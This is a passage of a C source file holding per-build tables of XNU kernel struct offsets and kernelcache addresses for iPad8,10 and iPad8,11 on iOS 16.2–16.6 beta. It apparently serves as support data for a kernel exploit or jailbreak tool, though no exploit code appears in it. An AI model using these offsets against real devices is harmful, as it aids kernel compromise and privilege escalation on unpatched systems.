.proc__object_size = 0x530, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0x0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2a9150, .kernelcache__gPhysBase = 0xfffffff00784f9d8, .kernelcache__gPhysSize = 0xfffffff00784f9d8 + 0x8, .kernelcache__gVirtBase = 0xfffffff00784dbc0, .kernelcache__perfmon_devices = 0xfffffff00a2e4300, .kernelcache__perfmon_dev_open = 0xfffffff007ec279c, .kernelcache__ptov_table = 0xfffffff007803890, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a2e3780, .kernelcache__vm_pages = 0xfffffff0078006c8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007802850, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2e3778, .kernelcache__vn_kqfilter = 0xfffffff007f14d00, }, //16.3 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D47", .device_id = "iPad8,10", .fileglob__fg_ops = 0x0, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0x0, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0x0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2b9178, .kernelcache__gPhysBase = 0xfffffff007853d48, .kernelcache__gPhysSize = 0xfffffff007853d48 + 0x8, .kernelcache__gVirtBase = 0xfffffff007851f28, .kernelcache__perfmon_devices = 0xfffffff00a2f4380, .kernelcache__perfmon_dev_open = 0xfffffff007ec7398, .kernelcache__ptov_table = 0xfffffff007807288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a2f3800, .kernelcache__vm_pages = 0xfffffff0078040c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007806248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2f37f8, .kernelcache__vn_kqfilter = 0xfffffff007f19a20, }, //16.3.1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D67", .device_id = "iPad8,10", .fileglob__fg_ops = 0x0, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0x0, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0x0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2b9178, .kernelcache__gPhysBase = 0xfffffff007853d48, .kernelcache__gPhysSize = 0xfffffff007853d48 + 0x8, .kernelcache__gVirtBase = 0xfffffff007851f28, .kernelcache__perfmon_devices = 0xfffffff00a2f4380, .kernelcache__perfmon_dev_open = 0xfffffff007ec7398, .kernelcache__ptov_table = 0xfffffff007807288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a2f3800, .kernelcache__vm_pages = 0xfffffff0078040c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007806248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2f37f8, .kernelcache__vn_kqfilter = 0xfffffff007f19a20, }, //16.4 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E246", .device_id = "iPad8,10", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a381208, .kernelcache__gPhysBase = 0xfffffff00792ffa0, .kernelcache__gPhysSize = 0xfffffff00792ffa0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00792e178, .kernelcache__perfmon_devices = 0xfffffff00a3bf500, .kernelcache__perfmon_dev_open = 0xfffffff007ee9a88, .kernelcache__ptov_table = 0xfffffff0078e3160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3be990, .kernelcache__vm_pages = 0xfffffff0078dfea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e2110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3be988, .kernelcache__vn_kqfilter = 0xfffffff007f3863c, }, //16.4.1 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E252", .device_id = "iPad8,10", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a381208, .kernelcache__gPhysBase = 0xfffffff00792ffa0, .kernelcache__gPhysSize = 0xfffffff00792ffa0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00792e178, .kernelcache__perfmon_devices = 0xfffffff00a3bf500, .kernelcache__perfmon_dev_open = 0xfffffff007ee9a88, .kernelcache__ptov_table = 0xfffffff0078e3160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3be990, .kernelcache__vm_pages = 0xfffffff0078dfea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e2110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3be988, .kernelcache__vn_kqfilter = 0xfffffff007f3863c, }, //16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:10:51 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8020", .build_version = "20F66", .device_id = "iPad8,10", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a389288, .kernelcache__gPhysBase = 0xfffffff0079340e0, .kernelcache__gPhysSize = 0xfffffff0079340e0 + 0x8, .kernelcache__gVirtBase = 0xfffffff0079322b8, .kernelcache__perfmon_devices = 0xfffffff00a3c7500, .kernelcache__perfmon_dev_open = 0xfffffff007eedc8c, .kernelcache__ptov_table = 0xfffffff0078e7160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3c6990, .kernelcache__vm_pages = 0xfffffff0078e3ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e6110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3c6988, .kernelcache__vn_kqfilter = 0xfffffff007f3cad8, }, //16.6b1 { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:00 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8020", .build_version = "20G5026e", .device_id = "iPad8,10", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a419ab0, .kernelcache__gPhysBase = 0xfffffff007944288, .kernelcache__gPhysSize = 0xfffffff007944288 + 0x8, .kernelcache__gVirtBase = 0xfffffff007942440, .kernelcache__perfmon_devices = 0xfffffff00a459530, .kernelcache__perfmon_dev_open = 0xfffffff007f0a434, .kernelcache__ptov_table = 0xfffffff0078f79a0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a458910, .kernelcache__vm_pages = 0xfffffff0078f40f8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078f6950, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a458908, .kernelcache__vn_kqfilter = 0xfffffff007f58c44, }, // iPad8,11 16.2 { .kern_version = "Darwin Kernel Version 22.1.0: Thu Oct 6 19:33:53 PDT 2022; root:xnu-8792.42.7~1/RELEASE_ARM64_T8020", .build_version = "20C65", .device_id = "iPad8,11", .fileglob__fg_ops = 0x0, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0x0, .proc__object_size = 0x530, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0x0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2a9150, .kernelcache__gPhysBase = 0xfffffff00784f9d8, .kernelcache__gPhysSize = 0xfffffff00784f9d8 + 0x8, .kernelcache__gVirtBase = 0xfffffff00784dbc0, .kernelcache__perfmon_devices = 0xfffffff00a2e4300, .kernelcache__perfmon_dev_open = 0xfffffff007ec279c, .kernelcache__ptov_table = 0xfffffff007803890, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a2e3780, .kernelcache__vm_pages = 0xfffffff0078006c8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007802850, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2e3778, .kernelcache__vn_kqfilter = 0xfffffff007f14d00, }, //16.3 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D47", .device_id = "iPad8,11", .fileglob__fg_ops = 0x0, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0x0, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0x0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2b9178, .kernelcache__gPhysBase = 0xfffffff007853d48, .kernelcache__gPhysSize = 0xfffffff007853d48 + 0x8, .kernelcache__gVirtBase = 0xfffffff007851f28, .kernelcache__perfmon_devices = 0xfffffff00a2f4380, .kernelcache__perfmon_dev_open = 0xfffffff007ec7398, .kernelcache__ptov_table = 0xfffffff007807288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a2f3800, .kernelcache__vm_pages = 0xfffffff0078040c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007806248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2f37f8, .kernelcache__vn_kqfilter = 0xfffffff007f19a20, }, //16.3.1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D67", .device_id = "iPad8,11", .fileglob__fg_ops = 0x0, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // 